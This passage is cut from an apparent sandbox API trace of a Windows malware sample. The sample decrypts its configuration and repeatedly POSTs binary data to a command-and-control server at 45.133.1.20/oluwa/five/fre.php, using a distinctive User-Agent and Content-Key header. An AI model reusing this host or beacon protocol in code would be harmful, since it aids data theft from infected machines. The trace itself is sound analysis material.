szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0230.975] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.976] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0230.991] GetProcessHeap () returned 0x6a0000 [0230.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0230.992] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.993] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0230.994] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.994] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0230.995] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.995] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0230.996] GetProcessHeap () returned 0x6a0000 [0230.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0230.997] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.997] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0230.998] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.001] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0231.002] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.002] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0231.002] GetProcessHeap () returned 0x6a0000 [0231.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0231.003] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0231.003] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0231.005] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0231.005] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0231.006] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0231.007] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0231.008] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0231.008] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0231.008] GetProcessHeap () returned 0x6a0000 [0231.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0231.009] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0231.009] GetProcessHeap () returned 0x6a0000 [0231.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba970 [0231.009] socket (af=2, type=1, protocol=6) returned 0x708 [0231.010] connect (s=0x708, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0231.033] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0231.033] GetProcessHeap () returned 0x6a0000 [0231.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0231.033] GetProcessHeap () returned 0x6a0000 [0231.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6daf28 [0231.034] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0231.036] wvsprintfA (in: param_1=0x6daf28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0231.036] GetProcessHeap () returned 0x6a0000 [0231.036] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6d9300 [0231.036] GetProcessHeap () returned 0x6a0000 [0231.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf28 | out: hHeap=0x6a0000) returned 1 [0231.037] GetProcessHeap () returned 0x6a0000 [0231.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0231.037] GetProcessHeap () returned 0x6a0000 [0231.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6daf28 [0231.037] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0231.038] wvsprintfA (in: param_1=0x6daf28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0231.038] GetProcessHeap () returned 0x6a0000 [0231.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0231.038] GetProcessHeap () returned 0x6a0000 [0231.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf28 | out: hHeap=0x6a0000) returned 1 [0231.039] send (s=0x708, buf=0x6bd460*, len=242, flags=0) returned 242 [0231.039] send (s=0x708, buf=0x6bb998*, len=159, flags=0) returned 159 [0231.039] GetProcessHeap () returned 0x6a0000 [0231.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0231.039] recv (in: s=0x708, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0231.114] GetProcessHeap () returned 0x6a0000 [0231.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0231.115] GetProcessHeap () returned 0x6a0000 [0231.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0231.115] GetProcessHeap () returned 0x6a0000 [0231.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9300 | out: hHeap=0x6a0000) returned 1 [0231.116] GetProcessHeap () returned 0x6a0000 [0231.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0231.117] closesocket (s=0x708) returned 0 [0231.117] GetProcessHeap () returned 0x6a0000 [0231.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba970 | out: hHeap=0x6a0000) returned 1 [0231.117] GetProcessHeap () returned 0x6a0000 [0231.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0231.118] GetProcessHeap () returned 0x6a0000 [0231.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0231.118] GetProcessHeap () returned 0x6a0000 [0231.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0231.119] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x143c) returned 0x708 [0231.121] Sleep (dwMilliseconds=0xea60) [0231.123] GetProcessHeap () returned 0x6a0000 [0231.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0231.124] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.124] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0231.129] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.130] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0231.140] GetProcessHeap () returned 0x6a0000 [0231.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0231.141] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.141] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0231.144] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.145] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0231.145] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.146] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0231.146] GetProcessHeap () returned 0x6a0000 [0231.146] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0231.147] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.147] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0231.148] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.148] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0231.149] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.149] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0231.149] GetProcessHeap () returned 0x6a0000 [0231.149] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0231.150] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0231.150] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0231.151] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0231.151] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0231.158] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0231.159] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0231.160] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0231.160] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0231.160] GetProcessHeap () returned 0x6a0000 [0231.160] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0231.160] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0231.161] GetProcessHeap () returned 0x6a0000 [0231.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0231.163] GetProcessHeap () returned 0x6a0000 [0231.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0231.167] GetProcessHeap () returned 0x6a0000 [0231.167] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0231.167] GetProcessHeap () returned 0x6a0000 [0231.167] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0231.168] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.169] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0231.210] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.211] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0231.227] GetProcessHeap () returned 0x6a0000 [0231.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0231.228] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.232] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0231.233] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.233] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0231.234] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.234] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0231.234] GetProcessHeap () returned 0x6a0000 [0231.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0231.236] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.237] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0231.238] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.238] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0231.242] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.243] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0231.243] GetProcessHeap () returned 0x6a0000 [0231.243] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0231.244] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0231.244] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0231.245] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0231.246] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0231.247] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0231.247] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0231.248] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0231.249] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0231.249] GetProcessHeap () returned 0x6a0000 [0231.249] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0231.249] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0231.249] GetProcessHeap () returned 0x6a0000 [0231.249] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa00 [0231.249] socket (af=2, type=1, protocol=6) returned 0x70c [0231.250] connect (s=0x70c, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0231.279] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0231.279] GetProcessHeap () returned 0x6a0000 [0231.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0231.279] GetProcessHeap () returned 0x6a0000 [0231.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6daf28 [0231.280] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0231.281] wvsprintfA (in: param_1=0x6daf28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0231.281] GetProcessHeap () returned 0x6a0000 [0231.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6d9c00 [0231.281] GetProcessHeap () returned 0x6a0000 [0231.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf28 | out: hHeap=0x6a0000) returned 1 [0231.282] GetProcessHeap () returned 0x6a0000 [0231.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0231.282] GetProcessHeap () returned 0x6a0000 [0231.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6daf28 [0231.285] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0231.286] wvsprintfA (in: param_1=0x6daf28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0231.287] GetProcessHeap () returned 0x6a0000 [0231.287] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0231.287] GetProcessHeap () returned 0x6a0000 [0231.287] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf28 | out: hHeap=0x6a0000) returned 1 [0231.287] send (s=0x70c, buf=0x6bd460*, len=242, flags=0) returned 242 [0231.288] send (s=0x70c, buf=0x6bb998*, len=159, flags=0) returned 159 [0231.288] GetProcessHeap () returned 0x6a0000 [0231.288] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0231.288] recv (in: s=0x70c, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0231.367] GetProcessHeap () returned 0x6a0000 [0231.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0231.368] GetProcessHeap () returned 0x6a0000 [0231.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0231.368] GetProcessHeap () returned 0x6a0000 [0231.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9c00 | out: hHeap=0x6a0000) returned 1 [0231.369] GetProcessHeap () returned 0x6a0000 [0231.369] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0231.369] closesocket (s=0x70c) returned 0 [0231.370] GetProcessHeap () returned 0x6a0000 [0231.370] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa00 | out: hHeap=0x6a0000) returned 1 [0231.370] GetProcessHeap () returned 0x6a0000 [0231.370] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0231.371] GetProcessHeap () returned 0x6a0000 [0231.372] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0231.372] GetProcessHeap () returned 0x6a0000 [0231.372] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0231.372] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1440) returned 0x70c [0231.375] Sleep (dwMilliseconds=0xea60) [0231.376] GetProcessHeap () returned 0x6a0000 [0231.376] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0231.377] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.378] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0231.460] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.460] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0231.474] GetProcessHeap () returned 0x6a0000 [0231.474] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6ba740 [0231.475] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.475] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6ba740, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad060) returned 1 [0231.476] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.477] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0231.477] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.478] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0231.478] GetProcessHeap () returned 0x6a0000 [0231.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba740 | out: hHeap=0x6a0000) returned 1 [0231.479] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.480] CryptDecrypt (in: hKey=0x6ad060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0231.488] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.489] CryptDestroyKey (hKey=0x6ad060) returned 1 [0231.490] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.490] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0231.490] GetProcessHeap () returned 0x6a0000 [0231.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0231.491] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0231.492] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0231.493] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0231.493] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0231.494] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0231.494] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0231.495] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0231.496] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0231.496] GetProcessHeap () returned 0x6a0000 [0231.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0231.496] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0231.496] GetProcessHeap () returned 0x6a0000 [0231.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0231.497] GetProcessHeap () returned 0x6a0000 [0231.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0231.497] GetProcessHeap () returned 0x6a0000 [0231.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0231.497] GetProcessHeap () returned 0x6a0000 [0231.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0231.498] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.499] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0231.509] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.509] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0231.520] GetProcessHeap () returned 0x6a0000 [0231.520] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0231.521] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.522] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad060) returned 1 [0231.523] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.523] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0231.524] 